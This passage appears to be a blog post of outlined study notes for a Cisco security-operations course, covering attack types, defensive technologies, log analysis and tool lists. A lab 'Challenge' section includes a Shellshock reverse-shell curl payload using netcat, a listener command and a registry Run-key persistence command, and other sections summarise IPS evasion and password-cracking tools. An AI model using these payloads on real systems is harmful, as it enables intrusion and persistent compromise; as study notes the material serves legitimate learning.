            1. Scheme: protocol
            2. Authority: name of server
            3. Path
            4. Query
            5. Fragment: follows a number (or pound) sign (#)
          3. Attacks
            1. Executing remote scripts: uses ascii encoded characters rather than standard characters;
              1. a PHP script hosted on the victim’s server that allows external scripts to be referenced and executed;
            2. Upload undesired files: by ..
            3. XSS (Cross site scripting) attacks
        9. Exploit kits
          1. automated framework, to discover and exploit vulnerabilities in an endpoint, infect it with malware, and execute malicious code;
          2. shadow domain: a second-level domain that is registered by a malicious person using compromised domain registration information from a legitimate site
          3. eg. Angler exploit kit was one of the largest and most effective
        10. rootkits
          1. Goal:  completely hide the activities of the attacker on the local system;
          2.  by very sophisticated attackers
          3. Identifying and reverse-engineering the rootkit could identify its presence
          4. keep software updated and anti-malware;
        11. privilege escalation
          1. password stores / guessing;
          2. password interception
          3. pass-the-hash tool
          4. memory extraction
          5. “privilege escalation attack” by high level ones
          6. Prevention: Strong password & Password Change;
        12. pivoting
          1. tunnel the network connections to compromised network
          2. simplified VPN tunnel
        13. post-exploitation tools example
          1. PowerShell is typically whitelisted and its malicious scripts are often not caught by anti-virus software
          2. Metasploit is a common penetration testing software tool.
            1.  Metasploit has included Mimikatz. Mimikatz is a post-exploitation tool to gather credential data from Windows systems;
        14. exploit kit example: Angler exploit kit chain of activities
          1. browses to a compromised legitimate web site
          2. web site contains a malicious obfuscated script (or iFrame) to redirect the victim to the rapidly changing Angler landing page
          3. The Angler exploit kit scans the victim’s machine for software vulnerabilities and then delivers an exploit
          4. After compromising the victim’s host, the actual malware payload (for example, Cryptowall) is delivere
          5. Malware CnC traffic occurs between the victim’s machine and the threat actor’s CnC servers
        15. explore endpoint attacks
        16. Challenge
          1. rlogin and the .rhost + + misconfiguration;
          2. Upload attacker’s public key to remote host by NFS share session, Then connecting by SSH;
          3. Exploit an Operating System Flaw
            1. Shell Shock;
            2. inject secret string() { :; };
            3. Reverse shell connection: from host to attacker when firewall blocks inbound connection;
              1. nc: netcat
              2. nc -lvp 9876
              3. curl -k -H ‘X: () { :;}; /bin/bash -c “nc -e /bin/bash 9876″‘
          4. Pivot
            1. using an instance (also referred to as a “foothold”) to “move” around the network
          5. Employ social engineering / phishing
            1. malicious attachment that launch a reverse TCP connection back;
          6. Persistence
            1.  update the Inside Windows host registry setting so that the reverse connection launches whenever;
            2. remotely launch shell or CMD in host by meterpreter;
            3. maintain persistency:
              1. hacking the basic input/output system (BIOS), hacking the boot sectors of a hard drive, using Windows log on scripts, and using the Windows Task Scheduler;
              2. REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "My App" /t REG_SZ /F /D "C:\Logs\x.exe"
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "My App" /t REG_SZ /F /D "C:\Logs\x.exe"
          7. Tunnel Exfiltrated Data
            1. Motives
              1. Few protocols are allowed: HTTP,  HTTPS, DNS, or ICMP and IRC;
              2. Less conspicuous protocol may also be the objective
              3. For example, tunneled using ICMP echo request and echo reply packets; (by ptunnel)
            2. Tunnel SSH traffic inside ICMP tunnel
      11. Understanding Network Security Technologies
        1. Defense-in-depth strategy
          1. layered approach to security
          2. providing redundant controls at multiple levels to mitigate risk
        2. defend across the attack continuum
          1.  three phases: before, during, and after;
            1. Device inventory (What?)
            2. Access controls, enforce policy, and block applications and overall access to assets
          2. BEFORE: control, enforce, harden;
          3. DURING: detect, block, defend;
          4. AFTER: scope, contain, remediate;
        3. Authentication, Authorization, and Accounting
          1. Authenticationidentifying users, including login and password dialog;
          2. Authorization: actions allowed once authenticated;
          3. Accounting: track what identities have done;
          4. local AAA db -> Scalability issues;
          5. AAA protocols
            1. RADIUS (Remote Authentication Dial-In User Service)
              1. uses UDP ports (1812-1813 or 1645-1646)
              2. authentication and authorization
            2. TACACS+ (Terminal Access Controller Access Control System Plus)
              1. TCP port 49
              2. separates authentication, authorization, and accounting
              3.  encrypts the entire body
        4. Identify and Access Management
          1. User, User Class, Device, Posture (compliance status, eg. antivirus / patches)
        5. Stateful Firewall
          1. firewall connection’s state table, inspects and allows or blocks traffic based on the connection state, port, and protocol;
          2. Routed mode: routing ability
          3. Transparent mode: layer 2 “bump in the wire” firewall with no routing ability
        6. Network Taps
          1. device that allows security analysts to capture traffic on an already overloaded or congested link between two network devices;
            1. must physically be inserted;
            2. interruption of the link at installation;
            3. rack-mounted space;
            4. connections increase, number of taps increase;
            5. Benefits: no congestion or degrade performance across the link;
            6. Fail-safe means that if hardware fails or power is lost, the connection between the two devices is not affected
        7. Switched Port Analyzer (SPAN)
          1. SPAN feature / port mirroring;
          2. SPAN consumes resources, thus, select wanted traffic only:
            1. doubles traffic internally;
            2. adds to the traffic being processed by the switch fabric;
            3. doubles forwarding engine load;
          3. Steps: Define the source port or VLAN, then select the destination port
        8. Remote Switched Port Analyzer (RSPAN)
          1. flooded into a special RSPAN VLAN,  destination port can then be located anywhere in the VLAN;
          2. Config.:
            1. Trunks are required
            2. destination port of source switch is RSPAN VLAN; while source port at destination switch is RSPAN VLAN;
            3. Thus, RSPAN cannot monitor BPDUs
          3. Drawback
            1. network performance degradation
        9. Intrusion Prevention System
          1. IDS produces alert while IPS can respond immediately, and prevent possible malicious traffic from passing;
          2. Strategies
            1. Anomaly detection: generally learns patterns from baseline;
            2. Rule-based detection: database of IPS rules / signatures
            3. Reputation-based: allow / block all traffic from known bad sources
        10. IPS Evasion Techniques: attempt to bypass the intrusion detection and traffic filtering functions;
          1. Traffic Fragmentation
            1. fragment IP traffic in a manner that is not uniquely interpreted;
            2. overwrite a portion of a previous TCP segment in a stream with new data in a subsequent TCP segment
            3. the offset values in the IP header do not match up as they should -> overlapping fragments -> IPS sensor may not know how the target system will reassemble;
          2. Traffic Substitution and Insertion
            1. substituting the payload data with other data in a different format but with the same meaning, eg.
              1. Using unicode representation instead of characters inside HTTP requests
              2. Exploiting case sensitivity and changing case of characters in a malicious payload
              3. Substitution of spaces with tabs, and vice versa
              4. Insertion: sends a malicious sequence byte-by-byte and inserts extra bytes of data within the malicious sequence;
          3. Encryption and Tunneling
            1. Tunneling traffic inside DNS / HTTP;
          4. Protocol-Level Misinterpretation
            1. causing the IPS sensor to ignore the traffic by causing them to misinterpret the end-to-end meaning of network protocols and see traffic differently from the target
            2. intentionally corrupts the TCP checksum of specific packets to confuse the IPS sensor
            3.  manipulate the endian format of data in the packet in an attempt to make the IPS sensor misinterpret the meaning of the data
          5. Resource Exhaustion
            1. Make IPS sensor to be busy by sending lots of fake traffic to produce noise;
          6. Timing Attacks
            1. performing their actions slower than normal, not exceeding the thresholds inside the time windows that the signatures use to correlate different packets together;
        11. Snort Rules
          1. real-time traffic analysis and packet logging
          2. core with detection engine (preprocessors and the IPS rule base (IPS signatures));
          3. Rules
            1. the rule header and the rule body;
            2. rule header: rule action, protocol, source and destination IP addresses, and source and destination port info.;
            3. content option in body: set rules that search for specific content
              1. Rules with multiple content statements are treated as an AND operation;
            4. msg option tells the logging and alerting engine the message
        12. VPNs: provides Confidentiality, Origin authentication, Data Integrity;
          1. Deployment mode: Site-to-site VPN and remote-access VPN;
          2. Underlying technology: IPsec VPN, SSL VPN, MPLSVPN, other Layer 2 technologies;
          3. Encryption
            1. Link encryption: entire frame is encrypted between two devices;
            2. Packet payload encryption: Only the packet payload is encrypted, thus, could be routed at Layer 3 network;
        13. Email Content Security
          1. Threat prevention with reputation filters: use online reputation service databases to identify bad senders;
          2. Policy enforcement with message filters:
          3. Spam detection: Email reputation (Who), Message content (Which), Message structure (How), Web reputation (Where);
          4. Virus detection
          5. Advanced malware protection
          6. Content filters
          7. Outbreak filters: prevent zero-day, blocked by stopping files with the infected file’s characteristics
          8. DLP scanning for outgoing mail to prevent data leakage;
        14. Web Content Security
          1. Web content security systems act as a web proxy for the HTTP and the HTTPS traffic;
          2.  pervasive threat that exists from accessing web sites and their content;
          3. transparent proxy deployment
          4. explicit proxy deployment (client-web browser must be statically set to use the HTTP proxy specifically)
        15. DNS Security
          1. monitoring DNSs and servers is a critical step in identifying and containing malware infections and investigating attacks;
          2. malware uses DNS to gain CnC or exfiltrate data;
        16. Network Based Malware Protection
          1.  takes action on files that are traversing the network;
          2. disposition by Cisco Cloud analysis: clean / malware / unknown;
            1. consists sandboxing test environment;
            2. use SHA256 for blueprinting;
            3. trajectory maps how the file is transferred between hosts
        17. Next Generation Firewall
          1. application visibility and control, advanced malware protection, URL filtering, SSL/TLS decryption, and next-generation intrusion prevention systems
          2. NGFWs (over standard firewall) perform various security functions, such as generating different types of logs and alerts related to suspicious activities, to protect the network from advanced attacks;
        18. Security Intelligence
          1. Gartner’s definition: evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject’s response to that menace or hazard
          2. Cloud-based services provide automatic updates that include dynamic lists of known CnC servers, dangerous URIs, or lists of known malicious hosts. eg. Talos Intelligence;
          3. in today’s next-generation firewalls
        19. Threat Analytic Systems
          1. Signatures with updated IP/domain blacklists and anti-virus signatures
          2. helps the security analyst identify generic security breaches from malware without known signatures
          3. detection with automatic behavior-based machine learning
        20. Network Security Device Form Factors
          1. Device implementation: physical, virtual, or cloud-based
          2. Data within the cloud is not natively secure, and customer data breaches are a major concern to enterprises
        21. Security Onion Overview (distribution of Linux)
          1. Ubuntu Linux OS and contains several useful security tools
            1. Full packet capture
            2. Network-based and host-based intrusion detection sensors
            3. Security analysis tools
            4. Deployment models
              1. Standalone
              2. Server-sensor: bulk of the collected data on the sensors until requested by the analyst’s client
              3. Hybrid
        22. Security Tools Reference by security analyst
          1. ***
        23. Explore Network Security Technologies
          1. TCP: SYN>SYN ACK>ACK; ACK>RST;
          2. ICMP: ECHO > REPLY;
        24. Challenge
          1. A blind spot is the failure to properly monitor DNS activity for security purposes
          2.  Cisco CTA dashboard‘s  “relative threat exposure”: How is my organization doing as it relates to others
      12. Understanding Endpoint Security Technologies
        1. Host-based Personal Firewall
        2. Host-based Anti-virus
        3. Host-based Intrusion Prevention System
        4. Application Whitelists and Blacklists
        5. Host-based Malware Protection
        6. Sandboxing
        7. File Integrity Checking
        8. Explore Endpoint Security
        9. Challenge
      13. Describing Security Data Collection
        1. Network Security Monitoring Placement
          1. before firewall: can detect new form of attack, but high overhead;
        2. Network Security Monitoring Data Types
          1. Session Data
            1.  transport protocol, source IP address, source port, destination IP address, and destination port and Time stamp;
          2. Full packet capture
            1. record all the bits transferred but storage requirements. common file type is PCAP;
          3. Transaction data
            1. log files contain transaction data, eg. SMTP, HTTP…
          4. Extracted content
            1. Objects that are mined from network traffic are considered extracted content
          5. statistical data
            1. security monitoring data types that aids in describing network activities at a higher level
          6. alert data
            1. produced by IDS or IPS
            2. could be False positive and false negatives;
          7. Syslog
            1. forward to syslog server
            2. eight syslog severity levels. Levels 0 through 7. Emergency, Alert, Critical, Error, Warning, Notice, Informational, Debug;
          8. Indicator of Compromise
            1. data point that is extracted from security data that can be used as a high fidelity predictor, eg. external IP address, changes in registry;
              1. OpenIOC is an extensible XML schema that enables security professionals to describe the technical characteristics that identify a known threat
          9. Network Time Protocol
            1. UDP 123;
        3. Intrusion Prevention System Alerts
          1. complementing other network security devices such as firewalls
          2. filter out false alerts
          3. correlate IPS alerts with other data, such as the firewall logs, DNS logs, web security logs, email logs, AAA server logs, applications logs, NetFlow records, and PCAPs traffic analysis
        4. True / False, Positive / Negative IPS Alerts
          1. True positive: A security control acted when malicious activity took place;
          2. True negative: A security control did not act, because there was no malicious activity;
          3. False positive: A security control acted when malicious activity did not take place; too tight controls;
          4. False negative: A security control did not act when malicious activity took place; too relaxed proactive controls
          5. Balanced practices:
            1. IDS: more sensitive a a cost of false positives;
            2. IPS: less sensitive to allow traffic required;
        5. IPS Alerts Analysis Process
          1. Goals: blocking attacks and identifying attacks;
          2. Questions
            1. Is this event a security threat?
            2. Is this information useful?
        6. Firewall Log
          1. firewall logs should be used with other forms of network security monitorings
          2. generally a small subset of log messages will initially provide the most benefit
        7. DNS Log
        8. Web Proxy Log
          1. use HTTP/HTTPS for the CnC communication
          2. should decrypt SSL/TLS traffic so that it can be inspected, eg.
            1. many POST commands going to an unknown site with a bad reputation, then data exfiltration may be assumed;
            2. GET commands to a suspicious website with a bad reputation containing .exe files could be a sign of droppers;
          3. “epoch time” format needs epoch converters;
          4. recognize some of the common HTTP request methods and status code
            1. URL redirection.
            2. Successful Transactions status codes
              1. 200 for OK
              2. 201 for Created
              3. 202 for Accepted
            3. Redirected Transactions status codes
              1. 301 for Moved permanently
              2. 302 for Moved temporarily
              3. 304 for Not modified
            4. Client-side errors status codes
              1. 400 for Bad request
              2. 401 for Unauthorized
              3. 403 for Forbidden
              4. 404 for Not found
            5. Server-side errors status codes
              1. 500 for Internal server error
              2. 501 for Not implemented
              3. 502 for Bad gateway
              4. 503 for Service unavailable
            6. HTTP request methods
              1. GET for Retrieval and simple searches
              2. POST for Submit data-query
              3. PUT for Upload data-files
              4. HEAD for Metadata retrieval
              5. DELETE for Remove resource
              6. TRACE for Application layer trace of route
              7. OPTIONS for Request available methods
              8. CONNECT for Tunnel SSL connection
              9. PROPFIND for Retrieve properties of an object
        9. Email Proxy Log
          1. DLP policy prevents users from sending out sensitive information;
        10. AAA Server Log
          1. handle both wired and wireless user requests with Authentication, Authorization and Accounting
        11. Next Generation Firewall Log
        12. Applications Log
          1. to verify that network and computer resources are being used appropriately / intentionally;
          2. /var/log or event viewer in Windows
        13. Packet Captures
          1. PCAP (Packet Captures) files: with data link-layer headers
          2. analyst must be aware of potential privacy concerns
        14. NetFlow
          1. developed by Cisco for the collection and monitoring of network session data;
          2. Data such as identities of the systems involved in the conversation, the time of the communication, and the amount of data transferred
          3. Like “phone bill“, NetFlow provides a complete audit trail of all network communications
        15. Network Behavior Anomaly Detection
          1. Baselines are used in anomaly detection, and defines what is normal;
          2. Its validity and usefulness can be impaired if the size of the sliding window is not set appropriately
        16. Data Loss Detection Using Netflow Example
          1. monitor outbound traffic larger than specific size;
        17. Security Information and Event Management Systems
          1. Correlation
        18. Explore Security Data for Analysis
        19. Challenge
      14. Describing Security Event Analysis
        1. Cyber Kill Chain
          1. model that describes the structure of an attack
          2. 7 stages
            1. Reconnaissance: Research, identify targets
            2. Weaponization: Coupling a remote access Trojan with an exploit
            3. Delivery: Transmission of the weapon to the target
            4. Exploitation: exploitation triggers intruders’ code
            5. Installation: installation of a remote access Trojan or backdoor
            6. Command and control
            7. Actions on objectives
          3. Usages
            1. Prioritize vast amount of security events data
            2. Set the escalation levels
            3. Determine the security controls that can be used to defend at the different stages
            4. Measure the effectiveness of the security controls
            5. Measure the security controls resiliency
            6. Measure analytic completeness
            7. Help to identify and group related intrusions into campaigns
          4. Benchmark: decrease time from compromise to discovery
        2. Advanced Persistent Threats
          1. Characteristics of APTs
            1. Pursues its objectives repeatedly over an extended period
            2. Adapts to defenders’ efforts to detect it
            3. Maintains a level of interactions with the attacker’s command and control
        3. Diamond Model for Intrusion Analysis
          1. Security analyst
            1. link together logs, events, and other meta-data by identifying patterns across massive data;
          2. framework by which an SOC team can organize and verify advanced persistent threats
          3. “For every intrusion event, there exists an adversary taking a step towards an intended goal by using a capability over infrastructure against a victim to produce a result.”
          4. Nodes in model
            1. Adversary: threat actor
            2. Capability: tools and/or techniques
            3. Infrastructure: physical and/or logical communication structures
            4. Victim: target
          5. Usage: analytical pivoting
        4. Cybersecurity Threat Models Summary
          1. Cyber Kill chain / APT / Diamond model
        5. SOC Runbook Automation
          1.  runbook, also known as playbook, typically contains a combination of workflows, tools, and processes;
          2. prescriptive collection of repeatable methods to detect and respond to security incidents;
          3. ensures that the responses can be changed and adapted in real time to detect and resolve security events efficiently
          4. collection of “plays,” and each play generates a report from some set of data sources
          5. runbook is that it’s very flexible
          6. SOC must build and use runbooks
        6. Malware Reverse Engineering
          1. clones the hard drive to a virtual environment to identify the issue;
          2. understanding how malware behaves, identify purposes and techniques;
        7. Chain of Custody
          1. chronological documentation or paper trail, showing the seizure, custody, control, transfer, analysis, and disposition of physical or electronic evidence
          2. document that describes the exact time that each person took possession of specific evidence
          3. custodian is responsible for storing the material in a location that no one else has access to
        8. Challenge
  4. Practices:
    1. Cisco simulators:
      1. Cisco Packet Tracer 7.0
      2. NetSim
    2. Tools:
      1. tcpdump
      2. wireshark
      3. Packets editor: WireEdit / Packet Editor;
      4. Build asset inventory list
      5. Cisco CLI Analyzer
      6. Open Sources Penetration testing:
        1. OpenVAS
        2. metasploit
      7. Password attack tools: Cain and Abel, John the Ripper, OphCrack, and L0phtCrack;
      8. Pass the Hash Attacks Tools: MetaPilot, PS Exec, MSVCTL, PSH Toolkit;
      9. Nikto: powerful web vulnerability scanner that uses plugins
        1. nikto -h > abc-report.txt
      10. OWASP (Open Web Application Security Project).
    3. My Tools
      1. WireShark
      2. Zenmap
      3. Loki
      4. CVSS
      5. OpenSOC
      6. PuTTy: remote access, ssh connection
      7. WinSCP: transfer files.
      8. WireShark: capture traffic
      9. Syinternals: contains 70 tools.
      10. OpenVAS (vulnerability scanner).
      11. Snort (open source IPS).
      12. SQUID. Open source web proxy server
      13. Virustotal.
      14. Security Onions (Linux w/ suite of tools for network security monitoring)
        1. Bro ( powerful network analysis framework
        2. ELSA ( centralized syslog framework
        3. OSSEC ( open source host-based IDS
        4. Sguil (
        5. Snort (
        6. Squert ( web application that is used to query and view event data that is stored in a Sguil database
        7. Suricata ( open source next-generation intrusion detection and prevention engine
      15. Github, a large open source community
        1.  YAML ( Incident response playbook
      16. Metasploitable 2: for security training and test.
      17. Tools at 11.23- Security Tools Reference
        1. Packet capture tools
          1. Cisco IOS Router and Cisco ASA (
          2. Netsniff-ng ( is a free Linux networking toolkit
          3. Sniffit ( is a distributed sniffer system
          4. cpdump ( is a powerful network packet analyzer for Linux
          5. T-Shark ( is a network protocol analyzer
          6. Wireshark ( is a GUI network protocol analyzer
          7. Microsoft Message Analyzer ( is a new tool for capturing, displaying, and analyzing protocol messaging traffic
        2. Network scanners
          1. NMAP ( is a free and open source (license) utility
          2. OpenVAS ( is an open source vulnerability-scanning suite
        3. Web testing tools
          1. Burp Suite ( is an integrated platform
          2. Nikto2 ( is an open source web server scanner
          3. OWASP Mantra ( a browser-based security framework,
          4. OWASP Mutillidae II ( is a free, open source, deliberately vulnerable web-application
        4. Password crackers
          1. Cain and Abel ( is a Windows-based password recovery tool
          2. John the Ripper ( is a fast password cracker
          3. L0phtCrack ( is a tool that is used to crack Windows passwords
          4. Ophcrack ( is a free Windows password cracker that is based on rainbow tables
        5. Penetration testing tools
          1. BackTrack ( is a free, bootable Linux distribution
          2. Kali Linux ( is a Linux distribution
          3. Metasploit Framework ( is a comprehensive tool set
        6. IPS/IDS
          1. Bro ( is a network analysis framework
          2. OSSEC is a host-based intrusion detection system (opensource)
          3. Snort ( is an open source network intrusion prevention
          4. Suricata ( is an Open Source Next Generation Intrusion Detection and Prevention Engine
        7. Network security monitoring tools
          1. Security Onion ( is an open source network security monitoring distribution
          2. Sguil ( is an intuitive GUI
          3. ELSA ( is a centralized syslog framework
          4. Splunk Enterprise ( is a platform for real-time operational intelligence
        8. Security intelligence tools
          1. Talos Intelligence Group is made up of leading threat researchers
          2. OWASP ( is an open community
          3. ( is a repository of malware samples
          4. VirusTotal ( is a subsidiary of Google
        9. SIEM.
          1. Alien Vault OSSIM.
          2. OpenSOC.
  5. References
    2. CCNA security (210-260) by Systematic.
    3. Google Security Research team (permanent):
    4. Search Engine of IoT device:
    5. Protection guidelines for wifi/bluetooth connections & passwords:
    6. password generator:
    7. Always read terms of services from your service providers:
    8. List of webs if they support 2Fauth:
    9. Online Port scanner:
    10. Cybersecurity of NIST:
    11. SANS Institute:
    12. Worst Passwords 2015.
    13. 10 Web application vulnerabilities list.
    14. Homoglyph Attack.
      1. Homoglyph Attack Generator.
    15. Windows commands references.
    16.  track information about public Internet presence
      1. What’s that site running?
    17. Telnet to test SMTP communication.
    18. OpenIOC (Indicator of Compromise).
  6. Actions:
    1. How to detect bot and rootkit;
    2. Firewall requirements;
    3. Prepare Security Playbook – prepare, gather and analyze security events;
    4. Snort
  7. Tasks in CY
    1. VLAN and routing
    2. secure switch ports
    3. MAC spoofing / ARP poisoning protection
    4. DHCP protection
    5. FW
      1. SYN flood protection
      2. stateful protection
      3. SMTP protection
  8. Exam:
    1. Terms such as cryptography used in X.509;
    2. % between attack resources exhaustion and time attack
    3. What should be included in NGFW?

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s